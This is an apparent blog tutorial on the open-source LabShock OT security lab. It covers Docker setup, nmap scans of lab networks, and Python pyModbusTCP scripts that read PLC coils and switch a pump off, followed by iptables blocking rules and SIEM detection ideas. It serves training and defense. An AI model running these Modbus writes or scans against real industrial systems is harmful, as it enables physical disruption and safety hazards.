
Introduction:
Operational Technology (OT) and Industrial Control Systems (ICS) are the backbone of critical infrastructure, yet they remain notoriously difficult to secure due to their unique protocols and safety constraints. Hands-on experience is crucial for defenders, but building a realistic industrial lab has traditionally required expensive, physical hardware. This is where LabShock, an open-source, Docker-based OT security lab developed by Zakhar Bernhardt, bridges the gap, allowing anyone to simulate, attack, and defend a virtual industrial plant from their laptop.
Learning Objectives:
- Set up a complete OT/ICS cybersecurity lab on your local machine using Docker and Linux commands.
- Perform network reconnaissance to discover industrial assets like PLCs, HMIs, and SCADA systems.
- Exploit unauthenticated industrial protocols (specifically Modbus) to manipulate physical processes.
- Implement defensive monitoring by integrating a SIEM and creating detection rules for OT-specific attacks.
You Should Know:
1. Deploying Your Virtual Industrial Control System
Before any hacking can occur, you need a target. The LabShock environment simulates a complete industrial network, including a Programmable Logic Controller (PLC), a SCADA/HMI interface, an engineering workstation, and an intrusion detection system (IDS). The entire lab is containerized using Docker, ensuring a lightweight, reproducible, and safe environment that can be spun up or torn down in minutes.
Step-by-step guide to install LabShock on Ubuntu/Debian:
This guide assumes you have a fresh Ubuntu VM (or native install) with `sudo` privileges.
1. Install Docker and Docker Compose:
Installing from Docker's official apt repository ensures you get the latest version. Run the following commands:

```bash
# Update system and install prerequisites
sudo apt update && sudo apt install -y ca-certificates curl gnupg lsb-release

# Add Docker's official GPG key and repository
sudo install -m 0755 -d /etc/apt/keyrings
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo tee /etc/apt/keyrings/docker.asc > /dev/null
echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

# Install Docker and the Docker Compose plugin
sudo apt update && sudo apt install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

# Add your user to the docker group to run commands without sudo
sudo usermod -aG docker $USER
newgrp docker
```
2. Clone and Build the LabShock Environment:
```bash
# Clone the official LabShock repository
git clone https://github.com/zakharb/labshock.git
cd labshock/labshock

# Build the Docker images and launch all containers in detached mode
docker compose build
docker compose up -d
```
What This Does: This process pulls and builds container images for each component (PLC, SCADA, Kali Linux, etc.) and configures their virtual network, effectively creating a mini-factory floor on your machine.
3. Access the Lab Components:
Once the containers are running, you can access the various web interfaces from your host browser:
Main Portal: `http://localhost`
OpenPLC (Target): `http://localhost:8080` (login: openplc/openplc)
FUXA HMI (SCADA Interface): `http://localhost:1881`
Engineering Workstation (Kali Linux): `http://localhost:5911/vnc.html` (no password required)
Pentest Station (SSH): `ssh pentest@localhost -p 2222` (password: pentest)
For a clean reset, use `docker compose down` followed by `docker compose up -d` to restart the lab.
2. Breaching the Perimeter: Reconnaissance of Industrial Networks
Once the lab is live, the first step for any red teamer is network discovery. OT networks, whether flat or segmented into Purdue levels, can be mapped using standard tools from the provided pentest station.
Step-by-step guide to enumerating assets with Nmap:
Access the pentest station via SSH: `ssh pentest@localhost -p 2222` (password: pentest).
1. Map the Supervisory Network (Level 3):
This network contains the SCADA, HMI, and engineering workstations.
```bash
# Perform a ping/ARP sweep to discover live hosts without port scanning
sudo nmap -sn -PR 192.168.3.0/24 -oG l3_network.gnmap
```
Expected output: IPs like `192.168.3.11` (SCADA), `192.168.3.10` (EWS).
2. Map the Control Network (Level 2):
This is the critical field network where PLCs and other controllers reside. Use the router as a gateway.
```bash
# Scan the lower network for live PLCs and RTUs
sudo nmap -sn 192.168.2.0/24
```
Expected output: The primary PLC at `192.168.2.2` will respond.
3. Service Scan on a Discovered PLC:
Now that you have the target PLC’s IP (192.168.2.2), perform a service version scan to identify open ports and protocols.
```bash
# Version-scan the Modbus, EtherNet/IP, SSH and HTTP ports on the PLC
sudo nmap -sV -p 502,44818,22,80 192.168.2.2
```
What This Does: This command checks for common OT ports. Port 502 is the default for Modbus TCP, an unauthenticated and highly vulnerable protocol widely used in ICS environments. Its presence is a green light for the next phase of the attack.
3. Exploiting Modbus: Manipulating Industrial Processes
The lack of authentication and encryption in legacy Modbus TCP is a critical vulnerability. An attacker with network access can read and write to a PLC’s coils and registers, directly controlling physical equipment like pumps, conveyors, or valves.
Step-by-step guide to reading and writing to a PLC using Python:
This script can be run from the pentest station or the Kali engineering workstation within LabShock.
1. Connect and Read Coil Values:
First, let’s establish a connection and read the status of the pump coils. Use the `pyModbusTCP` library (pre-installed in the lab).
```python
#!/usr/bin/env python3
from pyModbusTCP.client import ModbusClient

PLC_IP = "192.168.2.2"
PORT = 502

# Create a Modbus client (auto_open connects on the first request)
client = ModbusClient(host=PLC_IP, port=PORT, auto_open=True)

# Read coils 0-9 (status of pumps 1-5, etc.)
coils = client.read_coils(0, 10)
if coils:
    print(f"[*] Current coil states: {coils}")
    # Example: Coil 0 -> Pump 1 (1 = ON, 0 = OFF)
    print(f"[*] Pump 1 status: {'ON' if coils[0] else 'OFF'}")
else:
    print("[!] Failed to read coils")
```
2. Write to a Coil to Change Pump State:
Now, simulate an attacker’s goal of disrupting operations by turning off a pump. This continues the script above and reuses the same `client`.

```python
# Assuming pump 1 is controlled by coil 0, set it to OFF (False)
pump_to_control = 0
write_success = client.write_single_coil(pump_to_control, False)

if write_success:
    print(f"[!] SUCCESS: Coil {pump_to_control} written. Pump 1 is now OFF.")
    # Verify the change by reading again (read_coils returns None on failure)
    new_state = client.read_coils(0, 1)
    print(f"[*] Verification: Pump 1 status is now {'ON' if new_state and new_state[0] else 'OFF'}")
else:
    print("[!] Write operation failed.")
```

What This Does: This script directly interfaces with the PLC’s memory over the network, bypassing any higher-level SCADA logic. By turning a pump off or on, an attacker can cause physical damage, process disruption, or safety hazards. You can immediately see the change reflected on the SCADA HMI at `http://localhost:1881`.
4. Defensive Countermeasures: Hardening and Monitoring OT Environments
A robust defense requires preventing unauthorized access and rapidly detecting malicious activity. This involves network-level hardening and the deployment of a SIEM for log aggregation and alerting.
Step-by-step guide to implementing OT firewall rules and setting up a SIEM:
1. Network Hardening with `iptables`:
To block unauthorized Modbus traffic, we can apply a simple firewall rule on a jump box or the PLC’s gateway within the lab.
```bash
# Block all incoming traffic to the default Modbus port
sudo iptables -A INPUT -p tcp --dport 502 -j DROP

# Block EtherNet/IP traffic (another common industrial protocol)
sudo iptables -A INPUT -p udp --dport 44818 -j DROP

# Verify the rules are in place
sudo iptables -L INPUT -v -n
```
What This Does: These commands drop traffic to critical industrial protocol ports from every source, so the legitimate HMI loses access to the PLC as well; in a real deployment, place `-s <HMI address> -j ACCEPT` rules for the HMI and engineering workstation ahead of the DROP. EtherNet/IP explicit messaging also runs over TCP 44818, so a matching `-p tcp` rule is needed to cover it. After applying this, re-run the Python exploit or an `nmap` scan to `192.168.2.2` to confirm the connection times out, effectively neutralizing the attack.
2. Proactive Detection with an OT SIEM:
LabShock includes a pre-configured ELK stack (Elasticsearch, Logstash, Kibana) for log centralization. The first step is to ensure it’s ingesting the right data.
```bash
# From the LabShock directory, start the ELK stack components
docker compose -f docker-compose-elk.yml up -d

# Configuring Logstash to parse Modbus traffic logs is conceptual here: the lab
# ships a pre-configured pipeline. Check the 'collector' container's logs to see incoming data.
docker logs -f labshock-collector-1
```
What This Does: This spins up a SIEM that collects logs from the IDS and network sensors. Analysts can then create Kibana dashboards to visualize network traffic. For instance, an alert can be created for `tcp.port == 502`, which, if triggered, would indicate an attempt to communicate with the PLC on a critical port, providing an early warning for the attack demonstrated in Section 3. Because the HMI polls the PLC on port 502 continuously, such a rule should exclude known sources or key on Modbus write function codes to avoid constant false positives.
What Undercode Say:
- Key Takeaway 1: The barrier to entry for OT security training is now virtually zero. Open-source platforms like LabShock democratize access to complex industrial environments, enabling anyone to gain hands-on experience without physical hardware or expensive licenses.
- Key Takeaway 2: Legacy industrial protocols like Modbus remain a critical vulnerability, as they lack basic security features like authentication and encryption. Practicing exploits and defenses in a safe sandbox is the most effective way to prepare for real-world assessments.
By combining accessible tools with practical exercises, the cybersecurity community can bridge the critical skills gap in OT/ICS security. The future of defending our power grids, water systems, and factories lies in platforms like LabShock, which transform theoretical knowledge into actionable, hands-on capability.
Prediction:
As open-source OT testbeds like LabShock mature, they will inevitably become standard components in both corporate training pipelines and academic curricula. This democratization will lead to a significant and rapid increase in the number of security professionals capable of performing competent OT assessments. However, it also lowers the barrier for threat actors, likely resulting in a short-term surge of “script-kiddie” style attacks against exposed industrial control systems, highlighting the urgent need for proactive defense-in-depth strategies.
Reported By: Zakharb Labshock – Hackers Feeds